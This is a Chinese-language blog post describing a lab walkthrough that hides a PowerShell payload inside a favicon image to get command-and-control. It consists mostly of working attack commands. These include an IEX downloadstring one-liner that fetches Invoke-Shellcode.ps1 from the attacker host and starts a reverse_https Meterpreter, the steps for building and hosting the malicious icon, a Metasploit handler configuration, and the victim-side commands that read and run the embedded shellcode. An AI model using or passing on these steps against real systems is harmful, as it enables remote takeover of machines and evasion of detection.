Jirairya

command-and-control-images

2018-01-04

使用脚本将命令转化为图标,然后使用powershell执行

实验环境:

  • kali(IP:192.168.222.140)
  • win7

制作具有PS命令的txt文本

在kali机器下,制作具有PS命令的txt文本:

echo 'IEX((new-object net.webclient).downloadstring("http://192.168.222.140/Invoke-Shellcode.ps1"));Invoke-Shellcode -payload windows/meterpreter/reverse_https -LHOST 192.168.222.140 -LPORT 443 -force' > shellcode.txt

Alt text

创作恶意图标

使用create_favicon.py制作具有恶意命令的图片,改为ico文件,并将Invoke-Shellcode.ps1传到Web目录,:

root@kali:~/Desktop/C2-master# python create_favicon.py shellcode.txt evil.png

root@kali:~/Desktop/C2-master# mv evil.png /var/www/html/favicon.ico
 
root@kali:~/Desktop/C2-master# service apache2 start

Alt text

MSF监听

使用msf,根据shellcode.txt里的反向meterpreter进行反向监听:

msf > use exploit/multi/handler 

msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https

msf exploit(handler) > set LPORT 443
LPORT => 443

msf exploit(handler) > set LHOST 192.168.222.140
LHOST => 192.168.222.140

执行PS命令

在靶机win7上添加readFavicon.ps1模块,然后下载执行图标里的shellcode:

PS C:\Users\b404\Desktop> Import-Module .\readFavicon.ps1

PS C:\Users\b404\Desktop> Get-FaviconText -URL http://192.168.222.140/favicon.ic
o -WriteTo $env:TEMP

Alt text

MSF返回Meterpreter:

Alt text

Refer


Similar Posts

上一篇 域渗透的整理

Comments